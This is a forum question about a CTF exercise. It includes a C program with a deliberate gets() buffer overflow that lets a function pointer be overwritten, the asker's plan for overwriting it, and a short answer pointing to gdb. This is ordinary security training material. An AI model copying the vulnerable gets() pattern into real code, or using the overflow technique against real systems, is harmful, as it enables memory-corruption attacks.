Reputation: 88
How to find address of function in memory?
I am currently completing a CTF exercise where i must attempt to overwrite a function pointer on the stack through a buffer overflow here is the code:
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
char *gets(char *);
void complete_level() {
printf("Congratulations, you've finished :-) Well done!\n");
exit(0);
}
int main(int argc, char **argv) {
struct {
char buffer[64];
volatile int (*fp)();
} locals;
locals.fp = NULL;
gets(locals.buffer);
if (locals.fp) {
printf("calling function pointer @ %p\n", locals.fp);
fflush(stdout);
locals.fp();
} else {
printf("function pointer remains unmodified :~( better luck next time!\n");
}
exit(0);
}
The code will get input using the vulnerable gets() function and store it inside the buffer called buffer.
Since buffer is the largest variable in the struct it will allow me to overwrite variables below it on the stack. The next variable is the function pointer called fp.
In order to overwrite fp (and make it point to complete_level) i will need to find the address of the complete_level function in memory. Then write "A" 64 times, then write the functions address.
The problem i have is that i cannot find the address of the function.
So far i have tried objdump however that gives me a offset and not the full address:
objdump -M intel -d 3 | grep complete_level
1184: 80 3d 8d 2e 00 00 00 cmp BYTE PTR [rip+0x2e8d],0x0 # 4018 <completed.0>
11ac: c6 05 65 2e 00 00 01 mov BYTE PTR [rip+0x2e65],0x1 # 4018 <completed.0>
00000000000011c9 <complete_level>:
Here is an output of the executable under the file command:
3: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV),
dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2,
BuildID[sha1]=11a5f76e0d40b7f4fdc53d4dd60faac9f9e405be, for GNU/Linux 3.2.0, not stripped
Why is it not showing the full address? Also how can i get the full address of the function complete_level?
Upvotes: 0
Views: 1263
Answers (1)
Reputation: 139
just use gdb and crack it like i did here.
look at registers closely and see what moves where, when calls happen, etc...
Upvotes: 0
Related Questions
- Getting the memory address of a function in linux x86
- Find function's start offset in ELF
- given a function identifier, is there a command line program or a library function providing the address as stored in the elf file
- How to get address of function or global variable from its name in executable elf file for C?
- Getting the exact position of a specific OpCode in a binary file
- Getting the address of a function
- virtual and physical addresses of sections in elf files
- How to get address of printf function in arm executable
- What segment of .o file contains function xyz?
- Finding locations in machine code (gcc/objdump -d)